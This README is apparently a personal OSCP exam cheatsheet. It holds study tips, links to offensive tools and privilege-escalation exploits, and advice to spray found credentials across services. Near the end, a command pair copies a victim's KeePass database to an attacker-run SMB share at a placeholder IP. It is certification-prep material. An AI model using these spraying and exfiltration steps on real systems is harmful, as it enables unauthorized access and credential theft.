└── README.md


/README.md:
--------------------------------------------------------------------------------
  1 | v.0.1
  2 | 
  3 | First rule is: No cheatsheet is a great as the one you forge with your own hands. Rewrite the pdf with your own words!
  4 | 
  5 | **This is the key to success.**
  6 | 
  7 | And to make as many labs as you can.
  8 | 
  9 | Having conquered the OSCP with a flawless victory (maxed out score), I've honed a razor-sharp methodology that cuts through the noise. This is not your run-of-the-mill cheatsheet bloated with trivialities. It's a lean, lethal collection of the absolute essentials — the pure bone meat of the craft.
 10 | 
 11 | Let's kick this off by saying the current version of the course (2023) is rock solid. With the labs, it'll gear you up good for the exam. I'm pumped to hit the next learning trail.
 12 | ## Core Tenets:
 13 | - **Precision Over Complexity**: 
 14 |   - The core of success lies in a solid methodology.
 15 |   - However, remember to keep it straightforward—this is a basic exam, after all.
 16 | - **Don't Panic**: Stay cool under fire. Panic clouds judgement and leads to errors. Embrace the grind and remember, you've trained for this! 
 17 | - **Scheduled Breaks**: Adhere to pre-planned breaks to rest your mind and body. It's a marathon, not a sprint. 
 18 | - **Recharge**: Step outside, take a walk with your dog ; A short nap can reboot your mind, enhancing your problem-solving abilities upon return. 
 19 | - **Report:** Be ready to write it, simplify the method to the max, that's all. It can be word, but not from offsec, they have fucked up formatting.
 20 | 
 21 | ## Initial Foothold: Where to Begin
 22 | 
 23 | - Acquired the target's hostname? Enlist it in `/etc/hosts`. Still in the dark? Engage in rigorous enumeration!
 24 | - Feel something is missing? Use different tool/flag or... revert!
 25 | - Don’t jump, check every corner like a pro.
 26 | - If you don't have fully functional shell, try to make one, some exploits depends on this.
 27 | 
 28 | 
 29 | ## Digital Armory: Websites at Your Fingertips
 30 | 
 31 | Now, I'll provide you with a list of web resources you should have at your fingertips, along with insights on how to utilize them proficiently.
 32 | 
 33 | You know what is the best way to check if you see something unusual?
 34 | HIT UP GOOGLE AND HACKTRICKS! 
 35 | 
 36 | **google:** bla bla hacktricks
 37 | 
 38 | **google:** bla bla vulnerability
 39 | 
 40 | No nonsense here. I’ve listed only the rare and not-so-obvious commands. In the exam or on the field, you’ll encounter the unknown. No need to cram the whole web onto this cheatsheet.
 41 | 
 42 | https://www.revshells.com/
 43 | 
 44 | https://wadcoms.github.io/
 45 | 
 46 | https://lolbas-project.github.io/#
 47 | 
 48 | https://gtfobins.github.io/
 49 | 
 50 | https://gchq.github.io/CyberChef/
 51 | 
 52 | https://hashcat.net/wiki/doku.php?id=example_hashes
 53 | 
 54 | https://github.com/swisskyrepo/PayloadsAllTheThings
 55 | 
 56 | https://crackstation.net/
 57 | 
 58 | https://gchq.github.io/CyberChef/
 59 | 
 60 | The sequence doesn’t matter; master them. For me, this was my toolkit.
 61 | 
 62 | ## Cyber Arsenal: Tools of The Trade
 63 | 
 64 | I ain’t spoon-feeding you descriptions, work these tools out yourself. Most ain’t in the course, but they’re gold. If they show up in the course, you better damn well sit up. These are the kinds of tools I’d have killed to know from the get-go.
 65 | 
 66 | ##### AutoRecon
 67 | https://github.com/Tib3rius/AutoRecon
 68 | ##### FeroxBuster
 69 | https://github.com/epi052/feroxbuster
 70 | ##### enum4linux-ng
 71 | https://github.com/cddmp/enum4linux-ng
 72 | But remember, young Padawan, different version on Kali there is, yields different results it does. Equally intriguing both may be, worth checking with both, it is!
 73 | ##### CrackMapExec 
 74 | https://github.com/mpgn/CrackMapExec
 75 | And awesome cheatsheet: https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/
 76 | ##### PrivescCheck
 77 | https://github.com/itm4n/PrivescCheck/tree/master
 78 | ##### SweetPotato
 79 | https://github.com/CCob/SweetPotato
 80 | ##### JuicyPotatoNG
 81 | https://github.com/antonioCoco/JuicyPotatoNG
 82 | ##### GodPotato
 83 | https://github.com/BeichenDream/GodPotato
 84 | ##### pspy
 85 | https://github.com/DominicBreuker/pspy
 86 | ##### A single click single file web server for Windows
 87 | https://github.com/faustinoaq/sswws
 88 | 
 89 | And now, trumpets blaring, the essentials you need to grasp to catapult your cyber existence to a realm of ease:
 90 | ##### ligolo-ng
 91 | https://github.com/Nicocha30/ligolo-ng
 92 | 
 93 | 
 94 | ## SPRAY 'EM ALL: The "I'm stuck" Crusade
 95 | 
 96 | Stumbled upon a new user? **Throw it into `USERS.TXT`.**  
 97 | 
 98 | Caught wind of a new password? Or something that smells like one? **Toss it into `PASSWORDS.TXT`.**  
 99 | 
100 | Now, unleash the spray! **SPRAY! SPRAY! SPRAY!**
101 | 
102 | Whether it’s FTP, SSH, CME, SMB, Kerberos, admin consoles, or any credential-hungry beast, **feed 'em all.**  
103 | Default creds? Dumb creds? **Throw 'em into the fray.**  
104 | Encountered an alien software? Or a familiar one? **Hunt down those default credentials.**
105 | 
106 | New user on the block? Try the ol’ **username:password** trick. `user:user`, `admin:admin`, you know the drill.  
107 | Password cracking playing hard to get? **Spin the username as the password.**  
108 | Hashcat playing coy? Tried the rules? Now serenade it with **John**, or take **Crackstation** out for a spin.  
109 | John acting pricey? **Invite Hashcat and Crackstation to the dance.**  
110 | Crackstation not cutting it? **Hashcat and John might just do the tango.**
111 | 
112 | With the clock ticking away, I hammered down the final privilege escalation just an hour before the curtain call. And you know what? It's all thanks to keeping a cool head. Being damn calm in the chaos is not just good—it's golden!
113 | ## Weak Spots and hints: 
114 | 
115 | Now I'll unveil some tactical strikes against the soft points of various things.
116 | 
117 | ```bash
118 | xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/
119 | usr/share/windows-resources,share
120 | ```
121 | 
122 | Do you know that you do can do sth like this?
123 | 
124 | Do you want to compile files correctly?
125 | 
126 | Use this: https://github.com/X0RW3LL/XenSpawn
127 | 
128 | Do you know how to transfer files like with **SMB?** 
129 | 
130 | Attacker:
131 | ```bash
132 | sudo impacket-smbserver -smb2support sharename /tmp
133 | ```
134 | 
135 | Victim:
136 | ```shell
137 | net use \\192.168.00.000\sharename
138 | ```
139 | 
140 | ```bash
141 | copy .\Database.kdbx \\192.168.00.000\sharename
142 | ```
143 | 
144 | 
145 | -----
146 | 
147 | -  I'll keep this updated.
148 | - I hammered out this "cheatsheet" reflecting on what I would have wanted by my side as I kicked off my OSCP adventure.
149 | - Got suggestions? Hit me up at [raphostrovsky@pm.me](mailto:raphostrovsky@pm.me).
150 | 


--------------------------------------------------------------------------------